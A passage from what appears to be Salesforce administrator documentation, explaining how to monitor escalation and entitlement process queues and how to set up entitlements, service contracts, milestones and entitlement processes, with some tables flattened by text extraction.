2. Click Search to view all pending actions for any active case escalation rule, or set the filter criteria and click Search to view

only the pending actions that match the criteria. The filter options are:

Case To Escalate

The Case Number of the escalated case. The Case Number is a unique, automatically generated number used for
identifying the case.

Escalation Rule

The name of the rule used to escalate the case.

Rule Entry

The order in which the rule entry will be processed. A rule entry is a condition that determines how a case escalation
rule is processed. Each escalation rule can have a maximum of 3000 rule entries.

Escalation Action

The time criteria specified for the case to escalate as defined in the rule entry.

Ignore Business Hours

Indicates if the Ignore Business Hours checkbox is selected on the rule entry, meaning that the rule entry is in
effect at all times and ignores your organization's business hours.

Escalate At

The date and time at which the case will escalate as defined in the rule entry. Dates and times display in the time
zone of the user viewing the escalation rule queue.
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Added Date

The date and time at which the case was added to the queue. Dates and times display in the time zone of the user
viewing the escalation rule queue.

The filter is not case-sensitive.

To cancel pending actions:

1. Select the box next to the pending actions you want to cancel.
2. Click Delete. Salesforce cancels the pending action.

See Also:
Creating Escalation Rules
Viewing and Editing Escalation Rules

Monitoring the Entitlement Process Queue
Available in: Enterprise, Unlimited, and Developer and Editions

User Permissions Needed

“Modify All Data”To manage the entitlement process queue:

When Salesforce triggers an entitlement process that has time-dependent milestone actions, use the entitlement process queue
to view pending actions and cancel them, if necessary.

To view pending actions:

1. From Setup, click Monitoring > Entitlement Processes.
2. Click Search to view all pending actions for any active workflow rules, or set the filter criteria and click Search to view

only the pending actions that match the criteria. The filter options are:

Entitlement Process Name

The entitlement process.

Case Number

The case's automatically generated identifying number.

Milestone Name

The milestone that triggered the action.

Evaluation Date

The date the evaluated actions are scheduled to occur.

Created Date

The creation date of the case that triggered the entitlement process.

2179

Monitoring the Entitlement Process QueueMonitoring Support Processes



Username

The user who updated the case to trigger an entitlement process.

The filter is not case-sensitive.

To cancel pending actions:

1. Select the box next to the pending actions you want to cancel.
2. Click Delete.

ADDING ENTITLEMENTS AND SERVICE AGREEMENTS

Entitlement Management Overview
Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

Entitlement management lets you and your support agents:

• Verify if your customers are eligible for support

• Create and maintain service contracts for your customers

• Specify unique service levels for each customer, such as first response and resolution times

• Enforce service levels with time-dependent, automated processes that instruct agents how to resolve cases

Entitlement Management Features
Entitlement management includes the following features to help you provide the correct service levels to your customers:

Verifying Entitlements
Support agents can verify that customers are eligible for support before creating cases for them. Here's an example of
how support agents use entitlements:
1. A customer calls support.
2. A support agent searches for the caller's account, contact, asset, or service contract.
3. The agent verifies there's an active entitlement on the Entitlements related list.
4. The agents creates a case from the entitlement.

Defining Service Levels
Users can create and maintain service contracts that represent different kinds of customer support, such as warranties,
subscriptions, or maintenance agreements. Each service contract can include the specific products covered under the
agreement.

Enforcing Service Levels
You can add time-dependent processes to entitlements that specify the actions, or milestones, your support team must
take when service levels on cases are near violation, violated, or successfully completed.
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Providing Portal Access
You can add entitlement management to a Customer Portal or partner portal so that portal users can view their service
contracts and entitlements, and create cases with the correct entitlements.

Reporting on Entitlements and Service Levels
Administrators can use custom report types to define report criteria from which users can run and create reports on
entitlements and service contracts.

Important:  Only users in organizations with the Service Cloud can enable, create, and update entitlement management
items.

See Also:
Getting Started with Entitlement Management
Setting Up Entitlement Management

Entitlements Overview

Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

Entitlements help you determine if your customers are eligible for customer support so you can create cases for them. A
customer may be eligible for support based on a particular asset, account, or service contract. You can use entitlements on their
own or in conjunction with entitlement processes, which are timelines that contain all of the steps (or milestones) that your
support team must complete in order to resolve cases.

Depending on how entitlements are set up, you can view and create them on the Entitlements tab or from the Entitlements
related list on accounts, contacts, assets, or service contracts. Click Create Case on the Entitlements related list to create a
case that automatically includes the correct entitlement, account, contact, and asset.

If set up, the Entitlements or Entitlement Template related lists let you add existing entitlements to contacts and products.

Note:  Entitlements don't automatically apply to cases created with Web-to-Case or Email-to-Case. If needed, you
can add entitlements to these features using Apex code.

See Also:
Setting Up Entitlements
Entitlement Management Overview
Getting Started with Entitlement Management
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Getting Started with Entitlement Management
Answer these questions before setting up entitlement management.

Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Manage Entitlements”

AND

“Customize Application”

To set up entitlements:

Watch a Demo: Entitlements Management Setup (2:46 minutes)

Before you set up entitlement management, review these questions. Your answers will help determine the setup steps you need
to take.

Where do you want agents to verify that a contact or service contract is eligible for support?

You can set up entitlements so that users can view and create them from the Entitlements tab or from the Entitlements
related lists on these objects:

So Users Can View and Create Entitlements When...Add Entitlements to the Page Layouts of this Object

At least one contact on the account is eligible for support.Accounts

Specific contacts are eligible for support.Contacts

Specific assets (purchased products) are eligible for support.Assets

Support agents can verify that a specific service contract
includes support.

Service Contracts

The Entitlements related list has a Create Case link so users can create a new case that automatically includes the correct
entitlement. The case automatically includes any account, contact, or asset information from the entitlement.

How much detail do you want your entitlement management process to include?

Where you want support agents to verify entitlements helps determine the level of detail for your entitlement management
process. There are three models for managing entitlements, each with different levels of detail:

To Set UpUse IfEntitlement ModelYour Goal

See Setting Up Entitlements
Only.

Entitlements OnlySupport agents verify that
contacts or accounts are
eligible for customer support
before they create cases

• There's no need to manage
your customers'
entitlements as part of a
service contract
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To Set UpUse IfEntitlement ModelYour Goal

• Your entitlements don't
have a renewal process

• Entitlements aren't
purchased by your
customers; they're bundled
with products (warranties)

• Your customers'
entitlements are short term
and managed
independently of each
other

See Setting Up Service
Contracts with Entitlements.

Service Contracts with
Entitlements

Support agents verify that a
contact is eligible for support
based on a service contract

• Entitlements are
purchased and managed
separately from the
products they cover and
are part of a service
contract

• Your customers'
entitlements are renewed
at a contract level

• You use Salesforce for
customer support but not
necessarily for service
contract management

See Setting Up Service
Contracts with Contract Line
Items and Entitlements.

Service Contract with
Contract Line Items and
Entitlements

Support agents verify that a
contact is eligible for support
based on line items in a service
contract

• You use Salesforce for
customer support and to
manage your customers'
service contracts

• Your support team
manages service contract
transactions, such as
transfers, mergers, and
renewals

• Warranties, subscriptions,
or other support products
appear as line items on
your sales orders and map
to one or more
entitlements

• Entitlements are created
and updated through an
integration with your order
management system
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Note: You can switch to a different entitlement model at any time.

Do you want to predefine terms of support on the products offered to your customers?

If your organization uses the products feature, you can create entitlement templates on page 2194 so that agents can add
predefined terms of support to products. For example, you can create entitlement templates for Web or phone support
so that agents can easily add entitlements to products offered to customers.

Do you want to enforce service levels on cases?

You can add time-dependent processes to entitlements that specify the actions your support team must take when service
levels on cases are near violation, violated, or successfully completed. For example, you can set up entitlement management
to instruct support agents to call certain people when a customer's case is unresolved after two hours.

See Also:
Entitlement Management Overview
Entitlement Management Implementation Guide

Setting Up Entitlement Management

Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Manage Entitlements”To set up entitlement management

Before you begin, review the different entitlement management models and choose the one that’s best for your company.

Setting Up Entitlements Only

1. Enable entitlements.
2. Set up entitlements.
3. Create entitlements.
4. Optionally, create entitlement processes.

Setting Up Service Contracts with Entitlements

1. Enable entitlements.
2. Set up entitlements.
3. Create entitlements.
4. Optionally, create entitlement processes.
5. Set up service contracts.

Setting Up Service Contracts with Contract Line Items and Entitlements

1. Enable entitlements.
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2. Set up entitlements.
3. Create entitlements.
4. Optionally, create entitlement processes.
5. Set up service contracts.
6. Set up contract line items.

Enabling Entitlements

Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Manage Entitlements”To enable entitlements

Note:  Entitlement versioning is currently available through a pilot program. For information on enabling entitlement
versioning in your organization, contact salesforce.com.

1. From Setup, click Customize > Entitlement Management > Settings.
2. Select Enable Entitlements.
3. Optionally, select Enable Entitlement Versioning.

This allows you to create different versions of an entitlement process. Once you enable entitlement versioning, you can't
disable it. It will remain enabled even if you disable entitlement management.

4. Click Save.

See Also:
Setting Up Entitlements
Setting Up Entitlement Management
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Enabling Entitlement Versioning

Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Manage Entitlements”To enable entitlement versioning:

Note:  Entitlement versioning is currently available through a pilot program. For information on enabling entitlement
versioning in your organization, contact salesforce.com.

1. From Setup, click Customize > Entitlement Management > Settings.
2. Select Enable Entitlement Versioning.

Once you enable entitlement versioning, you can’t disable it, even if you disable entitlement management.

3. Click Save.

See Also:
Entitlement Versioning Overview
Creating New Versions of Entitlement Processes
Using New Versions of Entitlement Processes

Setting Up Entitlements

Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Manage Entitlements”

AND

“Customize Application”

To set up entitlements:

Getting Started

Enable entitlements before following the steps below.

Customizing Entitlements

These steps, which you can do in any order, let you customize entitlements based on your business needs and how your agents
work.
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• Customize entitlements fields.

This lets users add additional information to entitlements.

• Set field history tracking on entitlements.

This lets you see when field values were changed.

• Customize entitlement page layouts.

This lets you specify which entitlement fields display to users. To limit the number of cases entitlements support, add these
fields to entitlement page layouts:

DescriptionField

Lets you limit the number of cases the entitlement supports.Per Incident

The total number of cases the entitlement supports.Cases Per Entitlement

The number of cases the entitlement can support. This field
decreases in value by one each time a case is created with
the entitlement.

Remaining Cases

• Customize case page layouts to add the Entitlement Name lookup field.

This lets users add entitlements to cases.

• Customize account, contact, asset, and, if applicable, service contract page layouts to add the Entitlements related list.

This lets users verify entitlements and create cases that are automatically associated with the correct entitlement, account,
contact, and asset.

• Customize related lists on entitlements to add Cases and Contacts.

This lets users:

◊ View cases and contacts associated with entitlements
◊ Create cases automatically associated with the correct entitlements
◊ Add contacts to entitlements

Giving Users Access to Entitlement Management

• Verify user permissions, set field-level security, and make the Entitlements tab visible.

Enhancing and Extending Entitlements

Follow these optional steps to add more functionality and flexibility to your entitlement management implementation.

• Set up lookup filters on cases to restrict the entitlements-related items returned on cases.
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• Set up entitlement templates to predefine terms of customer support that users can add to products. For example, you can
create entitlement templates for Web or phone support so that users can easily add entitlements to products offered to
customers.

See Also:
Entitlements Overview
Entitlement Management Overview
Getting Started with Entitlement Management
Entitlement Management Implementation Guide

Setting Up Service Contracts

Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Manage Entitlements”

AND

“Customize Application”

To set up service contracts:

Service contracts are agreements between you and your customers for a type of customer support. Service contracts can represent
different kinds of customer support, such as warranties, subscriptions, or service level agreements (SLAs).

To set up service contracts, from Setup, click Customize > Entitlement Management > Service Contracts and:

1. Customize service contract fields.

This lets users add additional information to service contracts.

2. Customize service contract page layouts.

This lets you specify which service contract fields display to users.

3. Set field-level security on service contract fields.

This lets you choose which service contract fields users can access.

4. Set field history tracking on service contracts.

This lets you see when field values were changed.

5. Add the Service Contracts tab to an app.

This lets users view the Service Contracts tab in a specific app.

6. Customize account and contact page layouts to add the Service Contacts related list.

This lets users create, update, and verify service contracts from accounts and contacts.
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7. Create service contracts.

See Also:
Setting Up Entitlements
Getting Started with Entitlement Management
Entitlement Management Implementation Guide

Setting Up Contract Line Items

Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Manage Entitlements”

AND

“Customize Application”

To set up service contracts and contract line items with
entitlements:

Contract line items are specific products covered by a service contract. They only display to users on the Contract Line Items
related list on service contracts, not on contracts. You can only use contract line items if your organization uses products.

To set up contract line items, from Setup, click Customize > Entitlement Management > Service Contracts > Contract
Line Items and:

1. Customize contract line item fields.

This lets users add additional information to contract line items.

2. Customize contract line item page layouts.

This lets you specify which contract line item fields display to users.

3. Customize service contract page layouts to add the Contract Line Items related list.

This lets users create, edit, and delete contract line items from service contracts.

4. Set field-level security on contract line items.

This lets you choose which contract line item fields users can access.

5. Set field history tracking on contract line items.

This lets you see when field values were changed.

6. Add contract line items to service contracts.

Note:

• Schedules aren't available for contract line items.
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• Customer Portal users can’t access contract line items.

See Also:
Entitlement Management Implementation Guide
Setting Up Entitlements
Setting Up Service Contracts
Getting Started with Entitlement Management

Creating Milestones
Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Manage Entitlements”

AND

“Customize Application”

To create milestones:

Milestones are required steps in your support process. They're metrics that represent service levels to provide to each of your
customers. Examples of milestones include first response and resolution times on cases.

To create milestones:

1. From Setup, click Customize > Entitlement Management > Milestones.
2. Click New Milestone.
3. Enter a name and description.

We recommend naming milestones after common support tasks such as First Response Time or Resolution
Time. This helps users understand milestones when they view them on cases or entitlement processes.

4. Click Save.
5. Customize case page layouts to:

• Add these milestone fields:

DescriptionField

Shows a milestone's status on a case.Milestone Status

Shows a milestone's status on the case by displaying one
of the following icons:

Milestone Status Icon

◊  Compliant

◊  Open Violation

◊  Closed Violation
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• Add the Case Milestones related list. This lists milestones associated with a case.

You can customize the Case Milestone related list to add these fields:

DescriptionField

Shows the time it took to complete a milestone.
Automatically calculated to include any business hours on

Elapsed Time

the case. Elapsed Time is calculated only after the
Completion Date field is populated.

The date and time that the milestone tracking started.Start Date

Shows the time that remains before a milestone violation.
Automatically calculated to include any business hours on
the case.

Time Remaining

Shows the time to complete the milestone. Automatically
calculated to include any business hours on the case.

Target Response

6. Customize case milestone page layouts. The Case Milestone page appears when users click the name of a milestone from
the Case Milestones related list.

You can customize the Case Milestone page to add these fields:

DescriptionField

Icon ( ) that indicates a milestone completion.Completed

The date and time the milestone was completed.Completion Date

Shows the time it took to complete a milestone.
Automatically calculated to include any business hours on

Elapsed Time

the case. Elapsed Time is calculated only after the
Completion Date field is populated.

The entitlement process that is being used for the case.
Entitlement processes are optional.

Entitlement Process

The date and time that the milestone tracking started.Start Date

The date and time to complete the milestone.Target Date

Shows the time to complete the milestone. Automatically
calculated to include any business hours on the case.

Target Response

Shows the time that remains before a milestone violation.
Automatically calculated to include any business hours on
the case.

Time Remaining

Icon ( ) that indicates a milestone violation.Violation

7. Optionally, create an entitlement process that includes the milestone.
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Note:  You can add time-dependent workflow actions to milestones after they're added to entitlement processes. See
Adding Milestone Actions to Entitlement Processes on page 2204.

Tip: You can add validation rules to case milestones so that when users update a milestone on a case, it meets the
standards you specify before they can save it. For example, you can create a validation rule that ensures users select
milestone completion dates that occur after case creation dates.

To begin adding validation rules for case milestones, from Setup, click Customize > Cases > Case Milestones >
Validation Rules.

See Also:
Milestones Overview
Creating Entitlement Processes

Milestones Overview

Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

Milestones are required steps in your support process. They're metrics that represent service levels to provide to each of your
customers. Examples of milestones include first response and resolution times on cases. Milestones can display one of the
following statuses on cases:

ExampleDescriptionMilestone Status

The first response on a case is complete
or not in violation.

Milestones on the case are complete or
not in violation.

New cases display as compliant because
they're not in violation.

 Compliant

The first response on a case is
incomplete.

Milestones on the case are violated; steps
in a support process are incomplete.

 Open Violation

The first response on a case was
incomplete, but completed nonetheless.

Milestones on the case were violated, but
the steps in the support process were
completed.

 Closed Violation

Use milestones in conjunction with entitlement processes to ensure that agents interact with and resolve cases on time and
completely. Milestones define the steps in your support process, and entitlement processes enforce those steps.

You can create a custom report to view a list of cases with milestones by choosing the Cases with Milestones report type. You
can also view cases with milestones by creating case list views that filter on milestone fields.
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Milestone Actions

Milestone actions are time-dependent workflow actions that occur at every step (milestone) in an entitlement process. Examples
of milestone actions include sending email alerts to specified users an hour before a first response is near violation or automatically
updating certain fields on a case one minute after a first response successfully completes.

You can add three types of actions to milestones:

DescriptionAction Type

The actions to take when a milestone successfully completes. Success Actions

The actions to take when a milestone is near violation. Warning Actions

The actions to take when a milestone is violated. Violation Actions

You can automate the following actions for each action type:

ExampleDescriptionAutomation Type

Create a task for a support rep to call a
customer when a first response is
violated.

Assigns a task to a specific user. You can
specify the task's Subject, Status,
Priority, and Due Date.

Task

Notify case owners when their cases are
near violation of a first response.

Emails a specific template to a designated
recipient.

Email Alert

Update the case Priority field to High
when a first response is near violation.

Changes the value of a selected field. You
can specify a value or create a formula for
the new value.

Field Update

Send data about parts or services to an
external system after a first response is
successful.

Sends a message to a designated
endpoint. You can also specify a
username and the data you want to
include in the message.

Outbound Message

See Also:
Adding Milestones to Entitlement Processes
Adding Milestone Actions to Entitlement Processes
Using the Milestones Related List on Entitlements

2193

Creating MilestonesAdding Entitlements and Service Agreements



Creating Entitlement Templates
Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Manage Entitlements”To create entitlement templates:

Entitlement templates are predefined terms of customer support that you can quickly add to products. For example, you can
create entitlement templates for Web or phone support so that users can easily add entitlements to products offered to customers.

Note:  You can only use entitlement templates if your organization uses the products feature.

To create entitlement templates:

1. From Setup, click Customize > Entitlement Management > Entitlements > Templates.
2. Click New Template.
3. Enter the details:

DescriptionField

The name of the entitlement template.

We recommend using a descriptive name, such as Phone
Support. This helps users better understand entitlement
templates when they see them on related lists for products.

Entitlement Template Name

The number of days the entitlement is in effect.Term (Days)

The entitlement process associated with the entitlement.

Entitlement processes are timelines that include all of the
steps (milestones) that your support team must complete to

Entitlement Process

resolve cases. Each process includes the logic necessary to
determine how to enforce the correct service level for your
customers.

Lets you limit the number of cases the entitlement supports.Per Incident

The total number of cases the entitlement supports.

This field is only available if Per Incident is selected.

Cases Per Entitlement

The entitlement's supported business hours.Business Hours

The type of entitlement, such as Web or phone support.

Administrators can customize this field's values.

Type
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4. Click Save.
5. Customize product page layouts to add the Entitlement Templates related list.

Optionally, you can customize the Entitlement Templates related list to add the Type and Business Hours fields. This
lets users view the type of entitlement, such as Web or phone support, and any business hours that apply to the entitlement.

6. Click Save.

See Also:
Setting Up Entitlements
Entitlement Management Implementation Guide

Setting Up Entitlements-Related Lookup Filters on Cases
Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Manage Entitlements”To set up entitlement-related lookups on cases:

You can set up lookup filters on cases to restrict the entitlements-related items returned. For example, when portal users create
a case and select the Entitlement Name field, they can choose only entitlements registered to their account or contact.

To set up entitlement-related lookup filters on cases:

1. From Setup, click Customize > Entitlement Management > Settings.
2. Choose the item(s) you'd like returned in the lookup fields.

To ReturnClickLookup Field on Cases

Assets registered to the account on the
case.

Note: To ensure that the lookup fields
return all assets that share an account
with the case, choose only this option.

Same account on the caseAsset

Assets registered to the contact on the
case.

Same contact on the case

Assets associated with entitlements that
belong to the case's account.

Entitlements on the case's
account

Assets associated with entitlements
related to the case's contact.

Entitlements on the case's
contact

Entitlements with an Active Status.Active statusEntitlement
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To ReturnClickLookup Field on Cases

Entitlements associated with the
account on the case.

Same account on the case

Entitlements associated with the asset
on the case.

Same asset on the case

Entitlements associated with the contact
on the case.

Same contact on the case

Choosing multiple items acts as an AND function. For example, choosing Same account on the case and Same
contact on the case restricts items returned in the Asset field to assets registered to the account and contact on
the case.

Tip:  Choose items that match how your support reps verify support eligibility. For example, choose the
account-related items if your support reps verify support based on accounts.

3. Click Save.

See Also:
Setting Up Entitlements
Entitlement Management Implementation Guide

Giving Users Access to Entitlement Management
Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Manage Users”To create and edit users:

After you set up entitlement management, you can let users access the feature. Users must have:

• Specific user permissions

• Access to the appropriate fields

• Access to the appropriate tabs

Verify User Permissions
The following user permissions control access to different features in entitlement management:
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Permissions Are Automatically Enabled
on These Standard Profiles

Need These PermissionsUsers Who Will

System Administrator“Manage Entitlements”

AND

Set up entitlement management,
including milestones, entitlement
processes, and entitlement templates

“Customize Application”

System Administrator“Customize Application”

AND

Provide entitlement management to a
Customer Portal

“Manage Users” and “Edit Self-Service
Users”

System Administrator“Customize Application”

AND

Provide entitlement management to a
partner portal

“Manage Users”

System Administrator“Manage Custom Report Types”Create or update custom report types that
include entitlement management

Read Only, Standard User, Solution
Manager, Contract Manager, Marketing
User, and System Administrator

“Create and Customize Reports”Create and run reports based on
entitlement management custom report
types

Standard User, Solution Manager,
Contract Manager, Marketing User, and
System Administrator

“Create” on cases

AND

“Read” on entitlements

Create cases with entitlements

Standard User, Solution Manager,
Contract Manager, Marketing User, and
System Administrator

“Edit” on cases

AND

“Read” on entitlements

Change entitlements on cases

Read Only, Standard User, Solution
Manager, Contract Manager, Marketing
User, and System Administrator

“Read” on entitlementsVerify or view entitlements

None: enable the permission in a
permission set or custom profile

“Create” on entitlementsCreate entitlements

None: enable the permission in a
permission set or custom profile

“Edit” on entitlementsChange entitlements

Read Only, Standard User, Solution
Manager, Contract Manager, Marketing
User, and System Administrator

“Read” on entitlement contactsView entitlement contacts

None: enable the permissions in a
permission set or custom profile

“Create” on entitlement contacts

AND

Change entitlement contacts

“Delete” on entitlement contacts
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Permissions Are Automatically Enabled
on These Standard Profiles

Need These PermissionsUsers Who Will

Read Only, Standard User, Solution
Manager, Contract Manager, Marketing
User, and System Administrator

“Read” on service contractsVerify or view service contracts

None: enable the permission in a
permission set or custom profile

“Create” on service contractsCreate service contracts

None: enable the permission in a
permission set or custom profile

“Edit” on service contractsChange service contracts

Read Only, Standard User, Solution
Manager, Contract Manager, Marketing
User, and System Administrator

“Read” on contract line itemsVerify or view contract line items

None: enable the permissions in a
permission set or custom profile

“Edit” on service contracts

AND

Add contract line items to service
contracts:

“Create” on contract line items and
“Read” on products and price books

None: enable the permissions in a
permission set or custom profile

“Edit” on service contracts

AND

Change contract line items on service
contracts

“Edit” on contract line items and “Read”
on products and price books

Tip:  If a user permission isn't on a standard profile you need to use, create a permission set and enable the permission
in it, or clone the standard profile and enable the permission in the custom profile.

Set Field-Level Security
Choose which entitlement management fields users can view and edit. Field-level security settings let you specify users’ access
to fields on detail and edit pages, related lists, list views, reports, search results, email and mail merge templates, and portals.

You can set field-level security from a permission set, profile, or a particular field. To set field-level security, from Setup, click
Customize > Entitlement Management > Entitlements > Fields.

Make the Entitlements and Service Contracts Tabs Visible
Entitlement management has two tabs: the Entitlements tab, where users can create and manage entitlements, and the Service
Contracts tab, where users can create and edit service contracts and contract line items (if contract line items are set up). You
can create a custom app with these tabs or instruct your users to add the tabs to an existing tab set. Only users with the “Read”
permission on entitlements will see the Entitlements tab and only users with the “Read” permission on service contracts will
see the Service Contracts tab. Contract line items display on the Service Contracts tab for users who have the “Read” permission
on contract line items.

See Also:
Setting Up Entitlements
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Creating Entitlement Processes
Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Manage Entitlements”To create and update entitlement processes:

Note:  Entitlement versioning is currently available through a pilot program. For information on enabling entitlement
versioning in your organization, contact salesforce.com.

You can create up to 1000 entitlement processes and include up to ten milestones in each entitlement process. Be sure tocreate
milestones before creating entitlement processes.

To create an entitlement process:

1. From Setup, click Customize > Entitlement Management > Entitlement Processes.
2. Click New Entitlement Process.
3. Enter a name and description.
4. Select Active to enable the process.

Tip:  You may want to activate an entitlement process after you've added milestone actions to it. This is because
you can't update or delete milestone actions on a process after it's activated and applied to a case.

5. Optionally, if entitlement versioning is enabled, select Default Version to make this version of the entitlement process
the default.

6. Choose the criteria for cases to enter and exit the entitlement process:

Additional Actions to Take?DescriptionField

No.Based on case created date

Select if cases should enter the
process when they're created.

Case enters the process

Yes, a drop-down list displays for
selecting the custom date/time. You can

Based on a custom date/time field
on the case

Select if you want the value of a
custom date/time field on the case

only choose a custom date/time, not a
custom date.

to determine when the case enters
the process.

No.Based on when case is closed

Select if cases should exit the
process when they're closed.

Case exits the process
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Additional Actions to Take?DescriptionField

Yes, select one of the following:Based on custom criteria

Select if cases should exit the
process based on criteria you
define.

• Choose criteria are met and
select the filter criteria that a case
must meet for it to exit the process.
For example, set a case filter to
Priority equals Low if you
want cases with the Priority field
marked Low to exit the process.

Choose formula evaluates to
true and enter a formula that
returns a value of “True” or “False.”
Salesforce triggers the rule if the
formula returns “True.”

• Choose formula evaluates to
true and enter a formula that
returns a value of “True” or “False.”
Cases exit the process if the formula
returns “True.” For example, the
formula (Case: Priority
equals Low) AND(Case: Case
Origin equals Email, Web)
moves cases out of the process if
their Priority field is Low and
the Case Origin field is marked
Email or Web.

7. Click Save.
8. Optionally:

• Add milestones to the entitlement process.
• Customize case page layouts to add entitlement process fields.

Note: Entitlement processes only apply to cases with assigned entitlements.

See Also:
Monitoring the Entitlement Process Queue
Entitlement Processes Overview
Creating New Versions of Entitlement Processes
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Entitlement Processes Overview
Entitlement processes are timelines that include all of the steps (or milestones) that your support team must complete to resolve
cases.

Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

Note:  Entitlement versioning is currently available through a pilot program. For information on enabling entitlement
versioning in your organization, contact salesforce.com.

Entitlement processes are timelines that include all of the steps (milestones) that your support team must complete to resolve
cases. Each process includes the logic necessary to determine how to enforce the correct service level for your customers.

Not all entitlements require entitlement processes. For example, an entitlement might just state that a customer is eligible for
phone support and business hours define phone support to be 24/7. If you needed to add more to that definition—for example,
if certain people need to be emailed after a customer's case goes unresolved for two hours—you would use an entitlement
process.

You can create up to 1000 entitlement processes and include up to ten milestones in each entitlement process. Contact
salesforce.com for information on increasing the number of entitlement processes and milestones.

Entitlement versioning lets you make changes to existing entitlement processes, even if they’re assigned to active entitlements
and cases. This can be useful if the business rules behind your entitlement processes change, for example, or if you need to
create multiple versions of the same entitlement process that have only minor differences. With entitlement versioning, you
don’t need to create entirely new processes; you can simply create new versions of existing ones.

To view or cancel active entitlement processes, from Setup, click Monitoring > Entitlement Processes.

How Cases Move Through Entitlement Processes

1. A support agent adds an entitlement with an entitlement process to a case.
2. The case enters the process based on its creation date or a custom date/time field. A custom date/time field lets users edit

a date on the case to trigger when it enters the process.
3. Salesforce assigns milestones with matching criteria to the case. For example, if a milestone's criteria is Priority equals

High, and a case has a Priority of High, Salesforce assigns it to the Priority equals High milestone.

A case associates with one milestone at a time; it can associate with many milestones as it moves through the process.

4. Milestone actions determine when and if warning, violation, or success workflow actions fire for the case.
5. A support agent updates the case to complete a milestone action.
6. After a case is updated, it cycles through the entitlement process and initiates any milestones that match its criteria.
7. The case exits the process based on custom criteria or when it's closed.
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Note: Entitlement processes only apply to cases with assigned entitlements. You can view cases with assigned
entitlements by creating case list views that filter on entitlement process fields.

See Also:
Creating Entitlement Processes
Entitlement Versioning Overview
Entitlement Process Fields
Milestones Overview
Getting Started with Entitlement Management

Adding Milestones to Entitlement Processes

Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Manage Entitlements”To add milestones to entitlement processes:

Milestones are required steps in your support process. They're metrics that represent service levels to provide to each of your
customers. Examples of milestones include first response and resolution times on cases. Use milestones in entitlement processes
to enforce the steps in your support process.

You can create up to 1000 entitlement processes and include up to ten milestones in each entitlement process.

To add milestones to entitlement processes:

1. From Setup, click Customize > Entitlement Management > Entitlement Processes.
2. Click the name of an entitlement process.
3. Click New on the Milestones related list.
4. Choose the milestone.
5. In Time Trigger (Minutes) enter the number of minutes in which users need to complete the milestone before it

triggers an action.
6. Choose when the milestone starts:

Use IfToSelect

A milestone's Target Date is based
on when it's applied to a case—for

Calculate the milestone Target Date
when the milestone is applied to a case
(matches case criteria).

This may or may not match the
Entitlement Process start time, which
is usually when a case is created.

Milestone Criteria

example, reassigning a case to
development when support believes the
problem is a defect. This could occur at
any time and it's not based on the start
of the entitlement process (timeline).
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Use IfToSelect

A milestone's Target Date is based
on the start of the entitlement process

Calculate the milestone Target Date
when the entitlement process starts (by
default, when a case is created).

Entitlement Process

(timeline). For example, first response
and resolution times on a case always
calculate their Target Date when the
entitlement process starts.

7. Enter the order in which to process the milestone if a case matches the criteria of more than one milestone in an entitlement
process. Use this if you have similar milestones, such as first response and first response with a case Priority of high.

Cases can only match one milestone at a time in an entitlement process.

8. Enter the criteria a case must match for the milestone to apply to it:

• Choose criteria are met and select the filter criteria that a case must meet for a milestone to apply to it. For
example, set a case filter to Priority equals High if you want the milestone to apply to cases with the Priority
field marked High.

Choose formula evaluates to true and enter a formula that returns a value of “True” or “False.” Salesforce
triggers the rule if the formula returns “True.”

• Choose formula evaluates to true and enter a formula that returns a value of “True” or “False.” The milestone
applies to cases if the formula returns “True.” For example, the formula (Case: Priority equals High) AND
(Case: Case Origin equals Email, Web) applies the milestone to cases where the Priority field is High
and the Case Origin field is marked Email or Web. Note that you can’t use the Case Owner field in formulas.

9. Click Save.
10. Optionally:

• Customize entitlements page layouts to add the Milestones related list. This lets users view milestones on entitlements.
• Add actions to milestones in the entitlement process.

Note:  The Timeline field shows you any milestones added to the entitlement process:

•

The Milestone icon ( ) represents milestones.
• Click or hover your mouse pointer over each milestone to view its details.

•
Drag the Handle icon ( ) along the Timeline Zoom tool to view past and future milestones.

See Also:
Milestones Overview
Creating Milestones
Adding Milestone Actions to Entitlement Processes
Creating Entitlement Processes
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Adding Milestone Actions to Entitlement Processes

Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Manage Entitlements”

AND

“Customize Application”

To add milestone actions to entitlement processes:

Milestone actions are time-dependent workflow actions that occur at every step (milestone) in an entitlement process. Examples
of milestone actions include sending email alerts to specified users an hour before a first response is near violation or automatically
updating certain fields on a case one minute after a first response successfully completes.

Before adding milestone actions to entitlement processes, you need to create milestones and create entitlement processes.

To add milestone actions to entitlement processes:

1. From Setup, click Customize > Entitlement Management > Entitlement Processes.
2. Click the name of an entitlement process.
3. Click the name of a milestone on the Milestone related list.
4. Add actions to the milestone:

ExampleToClick Add Workflow Action and
Select

Create a task for a support rep to call a
customer when a first response is
violated.

Create a workflow taskNew Task

Notify case owners when their cases are
near violation of a first response.

Create an email alertNew Email

Update the case Priority field to
High when a first response is near
violation.

Define a field updateNew Field Update

Send data about parts or services to an
external system after a first response is
successful.

Define an outbound messageNew Outbound Message

Use an existing email alert to notify a
case owner when their case is near
violation of a first response.

Select an existing actionSelect Existing Action
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Note:  To make warning and violation actions time-dependent, add a time trigger first. The time trigger for
success actions is the time trigger on the milestone.

The Add Workflow Action button initially displays on the Success Actions section. It displays in the Warning Actions
and Violation Actions sections after you add time triggers to them.

• Click Add Time Trigger to add a time trigger to the milestone.

